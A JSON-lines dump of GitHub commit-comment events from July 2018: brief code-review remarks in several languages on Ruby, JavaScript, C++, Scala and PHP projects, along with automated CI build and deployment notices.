{"id":"8022023762","type":"CommitCommentEvent","actor":{"login":"Niall7459"},"repo":{"name":"CodeMC/HolographicDisplays"},"payload":{"comment":{"id":29842171,"position":null,"line":null,"path":null,"commit_id":"3a5aa2da3469fedf611e786694e0ca7a76847fef","created_at":"2018-07-26T11:09:25Z","updated_at":"2018-07-26T11:09:25Z","author_association":"NONE","body":"HEXT is a hack. It basically replaces the ProtocolLib classes in “bridge” package to add more placeholders.\r\n\r\nThe animations would still work if the api remains unchanged.\r\n\r\nHEXT will be compiled against filoghosts original builds. And he usually updates in accord with MC versions."}},"created_at":"2018-07-26T11:09:25Z"}
{"id":"8022023842","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842172,"position":13,"line":13,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:09:26Z","updated_at":"2018-07-26T11:09:26Z","author_association":"COLLABORATOR","body":"수정해서 다시 업로드하겠습니다."}},"created_at":"2018-07-26T11:09:26Z"}
{"id":"8022025593","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"cryptozeny/cpuminer-mc-yespower"},"payload":{"comment":{"id":29842174,"position":11,"line":66,"path":"cpu-miner.c","commit_id":"aef30850518efc82feb6263779e1f3599c796ed7","created_at":"2018-07-26T11:09:50Z","updated_at":"2018-07-26T11:09:50Z","author_association":"NONE","body":"It's probably better to upgrade the core as well. It'd sync slightly faster and will be more ready for a possible switch to yespower 1.0."}},"created_at":"2018-07-26T11:09:50Z"}
{"id":"8022025956","type":"CommitCommentEvent","actor":{"login":"d-w-moore"},"repo":{"name":"d-w-moore/irods"},"payload":{"comment":{"id":29842175,"position":null,"line":null,"path":null,"commit_id":"22e54b4f49b5eda23c0c9541b1ae852a222c8682","created_at":"2018-07-26T11:09:55Z","updated_at":"2018-07-26T11:09:55Z","author_association":"OWNER","body":"This script reproduces the bug // verifies its fix under the above patch"}},"created_at":"2018-07-26T11:09:55Z"}
{"id":"8022032960","type":"CommitCommentEvent","actor":{"login":"olexkalinichenko"},"repo":{"name":"olexkalinichenko/php"},"payload":{"comment":{"id":29842188,"position":6,"line":6,"path":"001.php","commit_id":"4cff72ff27db21226177e24c4e89f6640769ef74","created_at":"2018-07-26T11:11:30Z","updated_at":"2018-07-26T11:11:30Z","author_association":"OWNER","body":"khgjfv\r\n"}},"created_at":"2018-07-26T11:11:30Z"}
{"id":"8022036671","type":"CommitCommentEvent","actor":{"login":"olexkalinichenko"},"repo":{"name":"olexkalinichenko/php"},"payload":{"comment":{"id":29842196,"position":null,"line":null,"path":null,"commit_id":"4cff72ff27db21226177e24c4e89f6640769ef74","created_at":"2018-07-26T11:12:21Z","updated_at":"2018-07-26T11:12:21Z","author_association":"OWNER","body":"jgjhfv"}},"created_at":"2018-07-26T11:12:21Z"}
{"id":"8022039157","type":"CommitCommentEvent","actor":{"login":"Cyclodex"},"repo":{"name":"LucasBassetti/react-simple-chatbot"},"payload":{"comment":{"id":29842200,"position":4,"line":7,"path":"webpack.config.prod.js","commit_id":"78554d122578bda583ccd565716b2cad3cb0d872","created_at":"2018-07-26T11:12:54Z","updated_at":"2018-07-26T11:12:54Z","author_association":"NONE","body":"Okey, easy. Webpack complexity... :) Did you see my other comments as well, about peer/devDependencies... Cheers!"}},"created_at":"2018-07-26T11:12:54Z"}
{"id":"8022052800","type":"CommitCommentEvent","actor":{"login":"votemike"},"repo":{"name":"bbc/programmes-frontend"},"payload":{"comment":{"id":29842226,"position":5,"line":31,"path":"src/Controller/Helpers/IsiteKeyHelper.php","commit_id":"251120fec6a66eb24ba0b82a5023d7558159beea","created_at":"2018-07-26T11:15:51Z","updated_at":"2018-07-26T11:15:51Z","author_association":"CONTRIBUTOR","body":"This is not how V2 checked"}},"created_at":"2018-07-26T11:15:51Z"}
{"id":"8022056724","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29842233,"position":16,"line":90,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/train.rb","commit_id":"fb4e8033605aec4859790af722f23c22b700bef8","created_at":"2018-07-26T11:16:43Z","updated_at":"2018-07-26T11:16:43Z","author_association":"NONE","body":"нет смысла засовывать константу в \"протектед\", она все равно будет доступна\r\n```\r\n$ irb\r\n2.5.1 :001 > class A; protected; AA = 22; end;\r\n => 22 \r\n2.5.1 :002 > A::AA\r\n => 22 \r\n```"}},"created_at":"2018-07-26T11:16:43Z"}
{"id":"8022058788","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/cpuminer-mc-yespower"},"payload":{"comment":{"id":29842237,"position":11,"line":66,"path":"cpu-miner.c","commit_id":"aef30850518efc82feb6263779e1f3599c796ed7","created_at":"2018-07-26T11:17:12Z","updated_at":"2018-07-26T11:17:12Z","author_association":"OWNER","body":"good to know! thanks a lot :+1: "}},"created_at":"2018-07-26T11:17:12Z"}
{"id":"8022062137","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29842240,"position":null,"line":null,"path":null,"commit_id":"ee7ce22cd0c04c008a6d6149ad4837b43980a1a9","created_at":"2018-07-26T11:17:53Z","updated_at":"2018-07-26T11:17:53Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-26T11:17:53Z"}
{"id":"8022063582","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29842243,"position":16,"line":90,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/train.rb","commit_id":"fb4e8033605aec4859790af722f23c22b700bef8","created_at":"2018-07-26T11:18:13Z","updated_at":"2018-07-26T11:18:13Z","author_association":"NONE","body":"если есть желание создать пиватную констранту, вот почитай [тут](https://stackoverflow.com/questions/2873903/how-to-i-make-private-class-constants-in-ruby#)"}},"created_at":"2018-07-26T11:18:13Z"}
{"id":"8022073700","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842251,"position":10,"line":10,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:20:32Z","updated_at":"2018-07-26T11:20:32Z","author_association":"COLLABORATOR","body":"`let i = 0`"}},"created_at":"2018-07-26T11:20:32Z"}
{"id":"8022074531","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842253,"position":14,"line":13,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:20:44Z","updated_at":"2018-07-26T11:20:44Z","author_association":"COLLABORATOR","body":"`let z = 0`"}},"created_at":"2018-07-26T11:20:44Z"}
{"id":"8022076659","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29842255,"position":16,"line":90,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/train.rb","commit_id":"fb4e8033605aec4859790af722f23c22b700bef8","created_at":"2018-07-26T11:21:13Z","updated_at":"2018-07-26T11:21:13Z","author_association":"NONE","body":"ты не поправил регулярное выражение (уже оставлял коммент в прошлый раз)\r\nтвоя регулярка все также позволяет создавать номер из \"андерскоров\"\r\nправильная регулярка немного сложней"}},"created_at":"2018-07-26T11:21:13Z"}
{"id":"8022076987","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842256,"position":21,"line":20,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:21:17Z","updated_at":"2018-07-26T11:21:17Z","author_association":"COLLABORATOR","body":"`return result;` vrei sa intorci toata lista nu doar un element"}},"created_at":"2018-07-26T11:21:17Z"}
{"id":"8022080126","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842260,"position":24,"line":23,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:21:58Z","updated_at":"2018-07-26T11:21:58Z","author_association":"COLLABORATOR","body":"`console.log( result );`"}},"created_at":"2018-07-26T11:21:58Z"}
{"id":"8022081118","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842261,"position":12,"line":11,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:22:12Z","updated_at":"2018-07-26T11:22:12Z","author_association":"COLLABORATOR","body":"`let`"}},"created_at":"2018-07-26T11:22:12Z"}
{"id":"8022081543","type":"CommitCommentEvent","actor":{"login":"rlepigre"},"repo":{"name":"rlepigre/lambdapi"},"payload":{"comment":{"id":29842262,"position":null,"line":null,"path":null,"commit_id":"0efb25e7e1d7d407541cae6e9be7f18164e0de53","created_at":"2018-07-26T11:22:17Z","updated_at":"2018-07-26T11:22:17Z","author_association":"OWNER","body":"You should not do that, this line is for the binary file (which is not a folder). The library folder is removed by the `ocamlfind` command. Note that you may need to remove it by hand if it was not installed properly the first time."}},"created_at":"2018-07-26T11:22:17Z"}
{"id":"8022081850","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842263,"position":13,"line":12,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:22:21Z","updated_at":"2018-07-26T11:22:21Z","author_association":"COLLABORATOR","body":"`let`"}},"created_at":"2018-07-26T11:22:21Z"}
{"id":"8022082133","type":"CommitCommentEvent","actor":{"login":"emiliasmolko"},"repo":{"name":"emiliasmolko/boardGames"},"payload":{"comment":{"id":29842264,"position":null,"line":null,"path":null,"commit_id":"8ca5ea2404f9e3bdd91bb42dbb0c5e92b8c0917b","created_at":"2018-07-26T11:22:25Z","updated_at":"2018-07-26T11:22:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/95818ac2-c557-427c-88fd-7aa2d98bb0e9?env_id=ibm%3Ayp%3Aus-south \"boardGames\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1dfeec01-3e68-4e47-8825-d2d2cf72360a?env_id=ibm%3Ayp%3Aus-south \"boardGames\") deployed [boardGames](https://github.com/emiliasmolko/boardGames/releases/tag/deploy-ibm-yp-us-south-emiliasmolko-wecare-20180726-112224 \"deploy-ibm-yp-us-south-emiliasmolko-wecare-20180726-112224\") to [wecare](https://console.bluemix.net/apps/310bf06c-5186-4c6c-91cb-20af5f065cad?env_id=ibm:yp:us-south \"ibm:yp:us-south:emiliasmolko:wecare\"), including this commit"}},"created_at":"2018-07-26T11:22:25Z"}
{"id":"8022083678","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29842269,"position":29,"line":125,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"fb4e8033605aec4859790af722f23c22b700bef8","created_at":"2018-07-26T11:22:47Z","updated_at":"2018-07-26T11:22:47Z","author_association":"NONE","body":"прошу прощения, я ошибся в прошлый раз\r\nтолько \"рескью\" надо выравнивать с \"деф\" и \"энд\"\r\n\"ретрай\" выравнивают с остальным кодом"}},"created_at":"2018-07-26T11:22:47Z"}
{"id":"8022083767","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842270,"position":9,"line":9,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:22:48Z","updated_at":"2018-07-26T11:22:48Z","author_association":"COLLABORATOR","body":"`let`"}},"created_at":"2018-07-26T11:22:48Z"}
{"id":"8022117085","type":"CommitCommentEvent","actor":{"login":"krzemin"},"repo":{"name":"krzemin/octopus"},"payload":{"comment":{"id":29842327,"position":13,"line":24,"path":"octopus/src/main/scala/octopus/AppError.scala","commit_id":"d8cd6a839a6e6afedb91039d98de8abb8072bd56","created_at":"2018-07-26T11:30:18Z","updated_at":"2018-07-26T11:30:18Z","author_association":"OWNER","body":"there's no `raiseError` for `Future`"}},"created_at":"2018-07-26T11:30:18Z"}
{"id":"8022117675","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842330,"position":9,"line":9,"path":"index_text.js","commit_id":"55e8c27e2f7bc3761793f4db2bbe8ddc92b5fef3","created_at":"2018-07-26T11:30:25Z","updated_at":"2018-07-26T11:30:25Z","author_association":"COLLABORATOR","body":"`let result = []` linia 9"}},"created_at":"2018-07-26T11:30:25Z"}
{"id":"8022118494","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842331,"position":2,"line":2,"path":"tiledb/rest/json.h","commit_id":"33833bfa224853622c6236bd546e09c675b5b46e","created_at":"2018-07-26T11:30:36Z","updated_at":"2018-07-26T11:30:36Z","author_association":"CONTRIBUTOR","body":"Change to `json.h`"}},"created_at":"2018-07-26T11:30:36Z"}
{"id":"8022118979","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29842334,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T11:30:41Z","updated_at":"2018-07-26T11:30:41Z","author_association":"NONE","body":"I've seen you guys get accused before and is always the same thing. @mohancm \r\n\r\nAnyways, it is what it is. I don't even know why I said anything. Have fun"}},"created_at":"2018-07-26T11:30:41Z"}
{"id":"8022119099","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29842336,"position":null,"line":null,"path":null,"commit_id":"e87df4296dad412be15ee9be2ac11cd3f1c65e06","created_at":"2018-07-26T11:30:42Z","updated_at":"2018-07-26T11:30:42Z","author_association":"COLLABORATOR","body":"Hi Aman, \r\nThanks for considering the request, but I still see a room for improvement as the tutorial is very dry in explanation. It will be good if you can show some good example in chrome without using debugger and with some debug point set. Let me know if any questions."}},"created_at":"2018-07-26T11:30:42Z"}
{"id":"8022120860","type":"CommitCommentEvent","actor":{"login":"kubukoz"},"repo":{"name":"krzemin/octopus"},"payload":{"comment":{"id":29842340,"position":13,"line":24,"path":"octopus/src/main/scala/octopus/AppError.scala","commit_id":"d8cd6a839a6e6afedb91039d98de8abb8072bd56","created_at":"2018-07-26T11:31:04Z","updated_at":"2018-07-26T11:31:04Z","author_association":"NONE","body":"I meant renaming the method in AppError\n\nOn Thu, Jul 26, 2018, 13:30 Piotr Krzemiński <notifications@github.com>\nwrote:\n\n> there's no raiseError for Future\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/krzemin/octopus/commit/d8cd6a839a6e6afedb91039d98de8abb8072bd56#commitcomment-29842327>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA2npFEmJPJFJ05pcpDum7hjgfkWyHsAks5uKahLgaJpZM4Vhpno>\n> .\n>\n"}},"created_at":"2018-07-26T11:31:04Z"}
{"id":"8022121171","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842342,"position":37,"line":37,"path":"tiledb/rest/json.h","commit_id":"33833bfa224853622c6236bd546e09c675b5b46e","created_at":"2018-07-26T11:31:09Z","updated_at":"2018-07-26T11:31:09Z","author_association":"CONTRIBUTOR","body":"Change to `TILEDB_JSON_H`?"}},"created_at":"2018-07-26T11:31:09Z"}
{"id":"8022121950","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29842343,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T11:31:18Z","updated_at":"2018-07-26T11:31:18Z","author_association":"MEMBER","body":"Oh, wow! Now looking perfect!"}},"created_at":"2018-07-26T11:31:18Z"}
{"id":"8022121956","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29842344,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-26T11:31:18Z","updated_at":"2018-07-26T11:31:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T11:31:18Z"}
{"id":"8022126521","type":"CommitCommentEvent","actor":{"login":"mark-flixwagon"},"repo":{"name":"vmsavka/CmrUI"},"payload":{"comment":{"id":29842355,"position":1,"line":1,"path":"CmrUI.xcodeproj/xcuserdata/vasyl.savka.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist","commit_id":"f1c5690a61e462535ed5d18c35ea666e56cdba38","created_at":"2018-07-26T11:32:21Z","updated_at":"2018-07-26T11:32:21Z","author_association":"NONE","body":"@vmsavka Is this file versioned?"}},"created_at":"2018-07-26T11:32:21Z"}
{"id":"8022132444","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842365,"position":110,"line":110,"path":"tiledb/rest/json.h","commit_id":"33833bfa224853622c6236bd546e09c675b5b46e","created_at":"2018-07-26T11:33:42Z","updated_at":"2018-07-26T11:33:42Z","author_association":"CONTRIBUTOR","body":"Make sure to remove before submitting a PR."}},"created_at":"2018-07-26T11:33:42Z"}
{"id":"8022132652","type":"CommitCommentEvent","actor":{"login":"mostafasoufi"},"repo":{"name":"alifallahrn/booksinfo"},"payload":{"comment":{"id":29842367,"position":4,"line":13,"path":"index.php","commit_id":"0f1c083a6201bd154005322912928961aa2460b8","created_at":"2018-07-26T11:33:45Z","updated_at":"2018-07-26T11:33:45Z","author_association":"NONE","body":"👍🏻"}},"created_at":"2018-07-26T11:33:45Z"}
{"id":"8022136962","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29842375,"position":null,"line":null,"path":null,"commit_id":"6f1f5a5da0fcf70b69d3d828713f72da634b5801","created_at":"2018-07-26T11:34:42Z","updated_at":"2018-07-26T11:34:42Z","author_association":"COLLABORATOR","body":"@ddt-sawa \r\n山本指摘\r\n1　引数の名前が「firstArgument」など意味がわかりにくいものになっていたので、修正が必要です。\r\n（6-9の類似見直しです）\r\n2　インデントがずれている箇所があるので見直してください\r\n3　仕様では「第2引数がなかった場合のデフォルト値は1とする」とありますが、確認を行っているのが、「第1引数」「第2引数」どちらも入っている場合のみとなるので、「第2引数が省略された場合」の確認も追加でお願いします。"}},"created_at":"2018-07-26T11:34:42Z"}
{"id":"8022139873","type":"CommitCommentEvent","actor":{"login":"web-premier"},"repo":{"name":"sellyourmodel/front"},"payload":{"comment":{"id":29842386,"position":159,"line":170,"path":"src/AppBundle/Controller/SearchController.php","commit_id":"90319f2e41aa5633e05f9bd97d6559cc1afe45fe","created_at":"2018-07-26T11:35:24Z","updated_at":"2018-07-26T11:35:24Z","author_association":"COLLABORATOR","body":"Согласен, переделаю"}},"created_at":"2018-07-26T11:35:24Z"}
{"id":"8022143002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29842395,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-26T11:36:09Z","updated_at":"2018-07-26T11:36:09Z","author_association":"NONE","body":"159313706_Issue#6796 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1697 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-26T11:36:09Z"}
{"id":"8022145042","type":"CommitCommentEvent","actor":{"login":"krzemin"},"repo":{"name":"krzemin/octopus"},"payload":{"comment":{"id":29842404,"position":13,"line":24,"path":"octopus/src/main/scala/octopus/AppError.scala","commit_id":"d8cd6a839a6e6afedb91039d98de8abb8072bd56","created_at":"2018-07-26T11:36:37Z","updated_at":"2018-07-26T11:36:37Z","author_association":"OWNER","body":"what's wrong with current name?\n\nczw., 26 lip 2018 o 13:31 Jakub Kozłowski <notifications@github.com>\nnapisał(a):\n\n> I meant renaming the method in AppError\n>\n> On Thu, Jul 26, 2018, 13:30 Piotr Krzemiński <notifications@github.com>\n> wrote:\n>\n> > there's no raiseError for Future\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/krzemin/octopus/commit/d8cd6a839a6e6afedb91039d98de8abb8072bd56#commitcomment-29842327\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AA2npFEmJPJFJ05pcpDum7hjgfkWyHsAks5uKahLgaJpZM4Vhpno\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/krzemin/octopus/commit/d8cd6a839a6e6afedb91039d98de8abb8072bd56#commitcomment-29842340>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACXOiKzqH1iYDe3BUFPtQY6qfjtGj_Upks5uKah6gaJpZM4Vhpno>\n> .\n>\n\n\n-- \nPozdrawiam,\nPiotr Krzemiński\n"}},"created_at":"2018-07-26T11:36:37Z"}
{"id":"8022145536","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29842408,"position":null,"line":null,"path":null,"commit_id":"f4d8fe2cdd0e5aa97290c9df9b8fad94712ca041","created_at":"2018-07-26T11:36:44Z","updated_at":"2018-07-26T11:36:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-410](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-410).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-410-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T11:36:44Z"}
{"id":"8022145812","type":"CommitCommentEvent","actor":{"login":"web-premier"},"repo":{"name":"sellyourmodel/front"},"payload":{"comment":{"id":29842410,"position":3,"line":3,"path":"src/AppBundle/Resources/views/Block/filters.html.twig","commit_id":"90319f2e41aa5633e05f9bd97d6559cc1afe45fe","created_at":"2018-07-26T11:36:47Z","updated_at":"2018-07-26T11:36:47Z","author_association":"COLLABORATOR","body":"Добавил себе задачу в трекер"}},"created_at":"2018-07-26T11:36:47Z"}
{"id":"8022147108","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842414,"position":11,"line":507,"path":"tiledb/sm/cpp_api/array_schema.h","commit_id":"33833bfa224853622c6236bd546e09c675b5b46e","created_at":"2018-07-26T11:37:06Z","updated_at":"2018-07-26T11:37:06Z","author_association":"CONTRIBUTOR","body":"Hmmm, is there a reason for this design? I would move all the code of `tiledb_array_schema_to_json` into `ArraySchema::to_json`, and then `tiledb_array_schema_to_json` would call `ArraySchema::to_json`. "}},"created_at":"2018-07-26T11:37:06Z"}
{"id":"8022147875","type":"CommitCommentEvent","actor":{"login":"petrkozorezov"},"repo":{"name":"rbkmoney/erlang-school"},"payload":{"comment":{"id":29842416,"position":16,"line":16,"path":"task_2_3.erl","commit_id":"5b700273d83dca4dd3f178080469c87c83555cb4","created_at":"2018-07-26T11:37:17Z","updated_at":"2018-07-26T11:37:17Z","author_association":"CONTRIBUTOR","body":"Судя по контексту, обычно для таких целей используют атомы, а не строки."}},"created_at":"2018-07-26T11:37:17Z"}
{"id":"8022148188","type":"CommitCommentEvent","actor":{"login":"p53"},"repo":{"name":"privacyidea/privacyidea"},"payload":{"comment":{"id":29842417,"position":null,"line":null,"path":null,"commit_id":"834e9cd3e49aedbb77ece8c9b7bca070384f823c","created_at":"2018-07-26T11:37:20Z","updated_at":"2018-07-26T11:37:20Z","author_association":"NONE","body":"that would work, just notes:\r\n1. that fetch_one_resource couldn't be part of models class, to have all data related functionality where it should go\r\n2. why using 601 code not 404 and second one"}},"created_at":"2018-07-26T11:37:20Z"}
{"id":"8022149240","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29842422,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-26T11:37:35Z","updated_at":"2018-07-26T11:37:35Z","author_association":"NONE","body":"159313706_Issue#6796 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T11:37:35Z"}
{"id":"8022150701","type":"CommitCommentEvent","actor":{"login":"ram-marwaha123"},"repo":{"name":"ram-marwaha123/SpotifyAPI"},"payload":{"comment":{"id":29842429,"position":21,"line":21,"path":"SpotifyAPI/SpotifyGetDataAPI.cs","commit_id":"f3df653f1128236948740aeb5fd715c928fac164","created_at":"2018-07-26T11:37:56Z","updated_at":"2018-07-26T11:37:56Z","author_association":"OWNER","body":"Creates a connection to the endpoint specified (in this case the endpoint to get the access token)"}},"created_at":"2018-07-26T11:37:56Z"}
{"id":"8022151265","type":"CommitCommentEvent","actor":{"login":"s-hafiz"},"repo":{"name":"s-hafiz/Certificates"},"payload":{"comment":{"id":29842431,"position":null,"line":null,"path":null,"commit_id":"3127dde0fd4a5ca0ea7dd4bdef3b24c3470da3b6","created_at":"2018-07-26T11:38:04Z","updated_at":"2018-07-26T11:38:04Z","author_association":"OWNER","body":"LICT Certificate uploaded"}},"created_at":"2018-07-26T11:38:04Z"}
{"id":"8022154463","type":"CommitCommentEvent","actor":{"login":"vikash212000yadav"},"repo":{"name":"vikash212000yadav/website"},"payload":{"comment":{"id":29842437,"position":null,"line":null,"path":null,"commit_id":"39f98162424ea1dc29b8c0f309a6e2f597ac3d4c","created_at":"2018-07-26T11:38:46Z","updated_at":"2018-07-26T11:38:46Z","author_association":"OWNER","body":"add_album button created"}},"created_at":"2018-07-26T11:38:46Z"}
{"id":"8022155666","type":"CommitCommentEvent","actor":{"login":"web-premier"},"repo":{"name":"sellyourmodel/front"},"payload":{"comment":{"id":29842442,"position":12,"line":95,"path":"src/AppBundle/Controller/RegistrationController.php","commit_id":"6f8f1d9a673020d8a081130e280f802f6a6b5c89","created_at":"2018-07-26T11:39:05Z","updated_at":"2018-07-26T11:39:05Z","author_association":"COLLABORATOR","body":"Сделано"}},"created_at":"2018-07-26T11:39:05Z"}
{"id":"8022157404","type":"CommitCommentEvent","actor":{"login":"web-premier"},"repo":{"name":"sellyourmodel/front"},"payload":{"comment":{"id":29842448,"position":21,"line":21,"path":"app/DoctrineMigrations/Version20180626132556.php","commit_id":"07bbabb48553a35356cd86ea5000c31c7eb09e89","created_at":"2018-07-26T11:39:28Z","updated_at":"2018-07-26T11:39:28Z","author_association":"COLLABORATOR","body":"Поставил себе задачу в трекер"}},"created_at":"2018-07-26T11:39:28Z"}
